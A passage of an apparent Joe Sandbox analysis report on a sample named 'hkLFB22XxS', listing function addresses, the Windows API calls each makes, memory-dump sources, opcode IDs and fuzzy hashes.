                                                            • EncodePointer.KERNEL32(00000000), ref: 008342CA
                                                            • DecodePointer.KERNEL32(008341B8), ref: 008342E5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                            • String ID: RoUninitialize$combase.dll
                                                            • API String ID: 3489934621-2819208100
                                                            • Opcode ID: 3f936b8172b76fae5352a93c4d0d938cf46e2ddd2fc446e9f734c26896174a7a
                                                            • Instruction ID: fdf0cc4f53605cc1dd75591e96a1ca5eab9ae0f2e8cbdc8cb576e6f78f37ce08
                                                            • Opcode Fuzzy Hash: 3f936b8172b76fae5352a93c4d0d938cf46e2ddd2fc446e9f734c26896174a7a
                                                            • Instruction Fuzzy Hash: B9E0B678582311AFEF14AB64EC0DB053BA4F725742F14613BF211F16A1CBB99580DA54
                                                            Function 0087675A Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: _memmove$__itow__swprintf
                                                            • String ID:
                                                            • API String ID: 3253778849-0
                                                            • Opcode ID: f4fd3e921c37a78768245253f5814d4108beca0a9f1bc83745ed1e4181353ff9
                                                            • Instruction ID: ec3c46e3e2ab90ab0c97fea464f078b43500fac6c142815c50284983fd1faef2
                                                            • Opcode Fuzzy Hash: f4fd3e921c37a78768245253f5814d4108beca0a9f1bc83745ed1e4181353ff9
                                                            • Instruction Fuzzy Hash: 8E61DF30504A5A9BCF15EF28CC91EFE3BA8FF44708F048518F9999B196EB34D851CB92
                                                            Function 0089046F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00817F41: _memmove.LIBCMT ref: 00817F82
                                                              • Part of subcall function 008910A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00890038,?,?), ref: 008910BC
                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00890548
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00890588
                                                            • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 008905AB
                                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 008905D4
                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00890617
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00890624
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                            • String ID:
                                                            • API String ID: 4046560759-0
                                                            • Opcode ID: 73e187d4a757c4622daf5b3ca6139f7a1292e62ac14750688947f8387547b382
                                                            • Instruction ID: c397a1f6f8d6daf84da7b8aa4e692ac9f10e2edb37ec125aadb41f9960150471
                                                            • Opcode Fuzzy Hash: 73e187d4a757c4622daf5b3ca6139f7a1292e62ac14750688947f8387547b382
                                                            • Instruction Fuzzy Hash: 58514931608340AFCB14EB68C885EAABBE9FF84714F08491DF595D72A2DB31E944CF52
                                                            Function 00895A20 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetMenu.USER32(?), ref: 00895A82
                                                            • GetMenuItemCount.USER32(00000000), ref: 00895AB9
                                                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00895AE1
                                                            • GetMenuItemID.USER32(?,?), ref: 00895B50
                                                            • GetSubMenu.USER32(?,?), ref: 00895B5E
                                                            • PostMessageW.USER32(?,00000111,?,00000000), ref: 00895BAF
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Menu$Item$CountMessagePostString
                                                            • String ID:
                                                            • API String ID: 650687236-0
                                                            • Opcode ID: 12050e60593158db44ff8d1b4de7de2ee6cc01e52c8a0be5c8d565de1ffe9f2e
                                                            • Instruction ID: 8da53c6f7139312fda2e6668c4238430d0b76defd7a7dbff174b8dd5aec9b24e
                                                            • Opcode Fuzzy Hash: 12050e60593158db44ff8d1b4de7de2ee6cc01e52c8a0be5c8d565de1ffe9f2e
                                                            • Instruction Fuzzy Hash: 7B519131A00625EFCF15EFA8C855AAEB7B4FF48320F184469E945F7351CB70AE418B95
                                                            Function 0086F3DD Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 0086F3F7
                                                            • VariantClear.OLEAUT32(00000013), ref: 0086F469
                                                            • VariantClear.OLEAUT32(00000000), ref: 0086F4C4
                                                            • _memmove.LIBCMT ref: 0086F4EE
                                                            • VariantClear.OLEAUT32(?), ref: 0086F53B
                                                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0086F569
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Variant$Clear$ChangeInitType_memmove
                                                            • String ID:
                                                            • API String ID: 1101466143-0
                                                            • Opcode ID: e52a3b6d10b70b51828e131771edbcc76892ce0a00afe7e864af1816317d6a96
                                                            • Instruction ID: 56f667075cd44cdcad9f5af589ab5efdb554af5bc1d95c80916c6ad629c2edd9
                                                            • Opcode Fuzzy Hash: e52a3b6d10b70b51828e131771edbcc76892ce0a00afe7e864af1816317d6a96
                                                            • Instruction Fuzzy Hash: 91514CB5A00209DFCB14DF58D884AAAB7F8FF4C354B15856AEA59DB311D730E911CBA0
                                                            Function 008726F9 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 00872747
                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00872792
                                                            • IsMenu.USER32(00000000), ref: 008727B2
                                                            • CreatePopupMenu.USER32 ref: 008727E6
                                                            • GetMenuItemCount.USER32(000000FF), ref: 00872844
                                                            • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00872875
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                            • String ID:
                                                            • API String ID: 3311875123-0
                                                            • Opcode ID: 3eb59b02f14b13f242d605f9df66c7bcb23f82abc3c0f2ac25915e28c1d19935
                                                            • Instruction ID: f7df443b8b98c537093a88025a12b0f1f7dd35607ac96a81cdf2be333bb327a6
                                                            • Opcode Fuzzy Hash: 3eb59b02f14b13f242d605f9df66c7bcb23f82abc3c0f2ac25915e28c1d19935
                                                            • Instruction Fuzzy Hash: 7451A170A00209DBDF24CF68C888BADBBF4FF55314F148169E429DB299D771C944CB52
                                                            Function 00811765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00812612: GetWindowLongW.USER32(?,000000EB), ref: 00812623
                                                            • BeginPaint.USER32(?,?,?,?,?,?), ref: 0081179A
                                                            • GetWindowRect.USER32(?,?), ref: 008117FE
                                                            • ScreenToClient.USER32(?,?), ref: 0081181B
                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0081182C
                                                            • EndPaint.USER32(?,?), ref: 00811876
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                            • String ID:
                                                            • API String ID: 1827037458-0
                                                            • Opcode ID: a46b137351d99dfa4cdced0649c94b73669c0dedb5de53d3ccc6f2d16f0c2ad4
                                                            • Instruction ID: fca2ed7778458eee18f455906f522687fac210b6ddcae531562401ea03cb2569
                                                            • Opcode Fuzzy Hash: a46b137351d99dfa4cdced0649c94b73669c0dedb5de53d3ccc6f2d16f0c2ad4
                                                            • Instruction Fuzzy Hash: C341A0701053059FDB11DF28DC88BBA7BE8FF49724F144639F6A4C62A2D7319885DB62
                                                            Function 0089B958 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ShowWindow.USER32(008D67B0,00000000,017C4D80,?,?,008D67B0,?,0089B862,?,?), ref: 0089B9CC
                                                            • EnableWindow.USER32(00000000,00000000), ref: 0089B9F0
                                                            • ShowWindow.USER32(008D67B0,00000000,017C4D80,?,?,008D67B0,?,0089B862,?,?), ref: 0089BA50
                                                            • ShowWindow.USER32(00000000,00000004,?,0089B862,?,?), ref: 0089BA62
                                                            • EnableWindow.USER32(00000000,00000001), ref: 0089BA86
                                                            • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0089BAA9
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Window$Show$Enable$MessageSend
                                                            • String ID:
                                                            • API String ID: 642888154-0
                                                            • Opcode ID: 9edabcfb9922758fcac9b57bce47dec83646db8c29abe2722c13ee6703ff7d2a
                                                            • Instruction ID: f8bd8b57a528b2c51853aa1a00ebf32b72893191cb6493b61b416941db806012
                                                            • Opcode Fuzzy Hash: 9edabcfb9922758fcac9b57bce47dec83646db8c29abe2722c13ee6703ff7d2a
                                                            • Instruction Fuzzy Hash: CF414C30601251AFDF26EF68E689B957BE0FB05310F1C42A9EA48CF2A2D731E845CB51
                                                            Function 008873B1 Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetForegroundWindow.USER32(?,?,?,?,?,?,00885134,?,?,00000000,00000001), ref: 008873BF
                                                              • Part of subcall function 00883C94: GetWindowRect.USER32(?,?), ref: 00883CA7
                                                            • GetDesktopWindow.USER32 ref: 008873E9
                                                            • GetWindowRect.USER32(00000000), ref: 008873F0
                                                            • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00887422
                                                              • Part of subcall function 008754E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0087555E
                                                            • GetCursorPos.USER32(?), ref: 0088744E
                                                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 008874AC
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                            • String ID:
                                                            • API String ID: 4137160315-0
                                                            • Opcode ID: 0bac79fa7788642df78c22406dee3efabe576d315d55456d8607f6a6fab62506
                                                            • Instruction ID: ffaa977ec1971afcf56f05624f0e37124c35b0935a76e3ec1b2c6e9fa454a32a
                                                            • Opcode Fuzzy Hash: 0bac79fa7788642df78c22406dee3efabe576d315d55456d8607f6a6fab62506
                                                            • Instruction Fuzzy Hash: 51310472508306ABC724EF14D849F9BBBE9FF88304F10491AF588D7192C770EA48CB92
                                                            Function 00868D5B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 008685F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00868608
                                                              • Part of subcall function 008685F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00868612
                                                              • Part of subcall function 008685F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00868621
                                                              • Part of subcall function 008685F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00868628
                                                              • Part of subcall function 008685F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0086863E
                                                            • GetLengthSid.ADVAPI32(?,00000000,00868977), ref: 00868DAC
                                                            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00868DB8
                                                            • HeapAlloc.KERNEL32(00000000), ref: 00868DBF
                                                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 00868DD8
                                                            • GetProcessHeap.KERNEL32(00000000,00000000,00868977), ref: 00868DEC
                                                            • HeapFree.KERNEL32(00000000), ref: 00868DF3
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                            • String ID:
                                                            • API String ID: 3008561057-0
                                                            • Opcode ID: 689d387f7c515a8b58f16e07077bc4e0e061163951007ef395f15b7bae3c210c
                                                            • Instruction ID: f3744bc80845e68be79bcf19a99ced712df57b978b49eedff669c2dac3390483
                                                            • Opcode Fuzzy Hash: 689d387f7c515a8b58f16e07077bc4e0e061163951007ef395f15b7bae3c210c
                                                            • Instruction Fuzzy Hash: FB11EE31500604FFDB24AFA4DC08BAE7BA9FF41315F15422AE949D3251CB329900CBA0
                                                            Function 00868AF9 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00868B2A
                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00868B31
                                                            • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00868B40
                                                            • CloseHandle.KERNEL32(00000004), ref: 00868B4B
                                                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00868B7A
                                                            • DestroyEnvironmentBlock.USERENV(00000000), ref: 00868B8E
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                            • String ID:
                                                            • API String ID: 1413079979-0
                                                            • Opcode ID: 8206bf6d15cd5f589290bd3adb7ed76645717932acea57426048cdd47db11ac5
                                                            • Instruction ID: 85da743785cb52d873b91068a8ab55eddf6e7d8d908f577ca58ce9fee6c91cfc
                                                            • Opcode Fuzzy Hash: 8206bf6d15cd5f589290bd3adb7ed76645717932acea57426048cdd47db11ac5
                                                            • Instruction Fuzzy Hash: C31159B250024DEBDF019FA4ED49FDA7BA9FF08314F094165FE08E2161C7768D64AB60
                                                            Function 0089C19A Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 008112F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0081134D
                                                              • Part of subcall function 008112F3: SelectObject.GDI32(?,00000000), ref: 0081135C
                                                              • Part of subcall function 008112F3: BeginPath.GDI32(?), ref: 00811373
                                                              • Part of subcall function 008112F3: SelectObject.GDI32(?,00000000), ref: 0081139C
                                                            • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0089C1C4
                                                            • LineTo.GDI32(00000000,00000003,?), ref: 0089C1D8
                                                            • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0089C1E6
                                                            • LineTo.GDI32(00000000,00000000,?), ref: 0089C1F6
                                                            • EndPath.GDI32(00000000), ref: 0089C206
                                                            • StrokePath.GDI32(00000000), ref: 0089C216
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                            • String ID:
                                                            • API String ID: 43455801-0
                                                            • Opcode ID: bafdfe9886866bdbf6f3272bd8cb817f351e379c09d9803c3f7492ea0d6718aa
                                                            • Instruction ID: 68bc4b033b9d0b2c9a7942b044e138924c2735db154cdfe63d04024c66aca50d
                                                            • Opcode Fuzzy Hash: bafdfe9886866bdbf6f3272bd8cb817f351e379c09d9803c3f7492ea0d6718aa
                                                            • Instruction Fuzzy Hash: 8F11DE7640014DBFDF12AF94DC88EDA7FADFF08354F088022BA1996162D7719D55DBA0
                                                            Function 008303A2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 008303D3
                                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 008303DB
                                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 008303E6
                                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 008303F1
                                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 008303F9
                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00830401
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Virtual
                                                            • String ID:
                                                            • API String ID: 4278518827-0
                                                            • Opcode ID: 335e123ba7b8e75858fdab6b7ac2943bcb7861d3402f14cf76f805f43ee720f9
                                                            • Instruction ID: 9d21894eefb98443197ae0069b92eb49199b5752c5233900262f14649bfb2923
                                                            • Opcode Fuzzy Hash: 335e123ba7b8e75858fdab6b7ac2943bcb7861d3402f14cf76f805f43ee720f9
                                                            • Instruction Fuzzy Hash: 3D016CB09017597DE3009F5A8C85B52FFB8FF19354F04411BA15C87942C7F5A864CBE5
                                                            Function 0087568B Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0087569B
                                                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 008756B1
                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 008756C0
                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008756CF
                                                            • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008756D9
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 008756E0
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.2115311818.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                                            • Associated: 00000001.00000002.2115298120.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.000000000089F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115357305.00000000008C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115390246.00000000008CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.2115402845.00000000008D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_810000_hkLFB22XxS.jbxd
                                                            Similarity
                                                            • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                            • String ID:
                                                            • API String ID: 839392675-0
                                                            • Opcode ID: 90fd57c252cd248e33ee087478f0c9ff344ba86bbdbc3c10846f99192d0f029d
                                                            • Instruction ID: 2ce9095159112378f98902601b0c48fcfb0a3b28bf2b77958caaed857853211f
                                                            • Opcode Fuzzy Hash: 90fd57c252cd248e33ee087478f0c9ff344ba86bbdbc3c10846f99192d0f029d
                                                            • Instruction Fuzzy Hash: E4F03032241258BBE7266BA2DC0DEEF7B7CFFD6B11F04016AFB05D1062D7A15A0186B5
                                                            Function 008774D2 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • InterlockedExchange.KERNEL32(?,?), ref: 008774E5
                                                            • EnterCriticalSection.KERNEL32(?,?,00821044,?,?), ref: 008774F6
                                                            • TerminateThread.KERNEL32(00000000,000001F6,?,00821044,?,?), ref: 00877503
                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00821044,?,?), ref: 00877510
                                                              • Part of subcall function 00876ED7: CloseHandle.KERNEL32(00000000,?,0087751D,?,00821044,?,?), ref: 00876EE1
